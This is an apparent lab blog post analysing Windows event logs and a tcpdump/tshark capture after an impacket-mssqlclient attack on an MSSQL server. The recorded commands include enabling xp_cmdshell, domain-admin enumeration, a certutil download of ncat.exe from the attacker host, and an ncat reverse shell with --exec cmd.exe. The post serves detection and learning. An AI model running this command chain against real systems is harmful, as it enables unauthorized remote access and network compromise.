In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address, Source Port. Especially when the Logon Type is reported as 3 below.
An account was successfully logged on. Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: SECURITYNIK\sql-service Account Name: sql-service Account Domain: SECURITYNIK Logon ID: 0x4F4F11 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
...
Looking at another entry did peek my interest though. Why would sqlservr.exe be spawning cmd.exe with command line "C:\Windows\system32\cmd.exe" /c whoami. This is definitely more interesting than the above entry.
A new process has been created. Creator Subject: Security ID: NT SERVICE\MSSQL$SQLEXPRESS Account Name: MSSQL$SQLEXPRESS Account Domain: NT Service Logon ID: 0x1718F Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x123c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xa04 Creator Process Name: C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c whoami
Next up, we see cmd.exe executing the whoami.
A new process has been created. Creator Subject: Security ID: NT SERVICE\MSSQL$SQLEXPRESS Account Name: MSSQL$SQLEXPRESS Account Domain: NT Service Logon ID: 0x1718F Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1724 New Process Name: C:\Windows\System32\whoami.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x123c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: whoami
Here we see the Domain Admins group being enumerated.
A new process has been created. Creator Subject: Security ID: NT SERVICE\MSSQL$SQLEXPRESS Account Name: MSSQL$SQLEXPRESS Account Domain: NT Service Logon ID: 0x1718F Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x360 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xa04 Creator Process Name: C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"
Here we see the hosts downloading ncat.exe via Certutil.
A new process has been created. Creator Subject: Security ID: NT SERVICE\MSSQL$SQLEXPRESS Account Name: MSSQL$SQLEXPRESS Account Domain: NT Service Logon ID: 0x1718F Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1598 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xa04 Creator Process Name: C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe Process Command Line: "C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
Here is what it looked like when the ncat was executed.
A new process has been created. Creator Subject: Security ID: NT SERVICE\MSSQL$SQLEXPRESS Account Name: MSSQL$SQLEXPRESS Account Domain: NT Service Logon ID: 0x1718F Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xc6c New Process Name: C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1578 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe
While I was looking at the logs to see what transpired, I was also capturing packets using the following:
┌──(rootđź’€securitynik)-[~/packets] └─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes ^C2841 packets captured 2841 packets received by filter 0 packets dropped by kernel
Interestingly, I thought most of the communication was encrypted but I was wrong. As I looked at a few packets, I could see the queries I executed.
Looking at the type of packets captured.
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r impacket-sql.pcap -q -z io,phs =================================================================== Protocol Hierarchy Statistics Filter: eth frames:2841 bytes:4068111 ip frames:2841 bytes:4068111 tcp frames:2835 bytes:4066653 tds frames:90 bytes:460551 _ws.malformed frames:7 bytes:2500 tcp.segments frames:2 bytes:12052 tds.prelogin frames:1 bytes:320 tds.prelogin frames:1 bytes:320 data frames:135 bytes:8100 http frames:4 bytes:11948 media frames:2 bytes:11564 tcp.segments frames:2 bytes:11564 tls frames:827 bytes:121673 udp frames:6 bytes:1458 nbdgm frames:6 bytes:1458 smb frames:6 bytes:1458 mailslot frames:6 bytes:1458 browser frames:6 bytes:1458 ===================================================================
Looking at the tds messages, first up the "type == 1"
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1' 20 9.933875 10.0.0.107 → 10.0.0.5 TDS 316 SQL batch 24 17.281790 10.0.0.107 → 10.0.0.5 TDS 132 SQL batch 92 973.952996 10.0.0.107 → 10.0.0.5 TDS 170 SQL batch 96 981.491834 10.0.0.107 → 10.0.0.5 TDS 168 SQL batch 100 987.357432 10.0.0.107 → 10.0.0.5 TDS 132 SQL batch 104 996.015944 10.0.0.107 → 10.0.0.5 TDS 138 SQL batch ....
Looking at some of the responses, "type == 4"
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4' 6 0.101021 10.0.0.5 → 10.0.0.107 TDS 91 Response 15 0.111340 10.0.0.5 → 10.0.0.107 TDS 333 Response[Malformed Packet] 17 0.129048 10.0.0.5 → 10.0.0.107 TDS 473 Response 22 10.135335 10.0.0.5 → 10.0.0.107 TDS 666 Response 26 17.489552 10.0.0.5 → 10.0.0.107 TDS 173 Response 94 974.032998 10.0.0.5 → 10.0.0.107 TDS 294 Response ....
Looking at some of these messages, I see the commands I executed.
┌──(rootđź’€securitynik)-[~/packets] └─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | moreRunning as user "root" and group "root". This could be dangerous. tds.type tds.query 4 4 4 1 exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI GURE;\r\n 4 1 exec master..xp_cmdshell 'whoami'\r\n 1 exec master..xp_cmdshell 'net users'\r\n 1 exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n 1 exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n 1 exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n
I was able to see the responses also. However, in most cases it does not really make sense to post them here.
Ok, that's it for me and this post.
No comments:
Post a Comment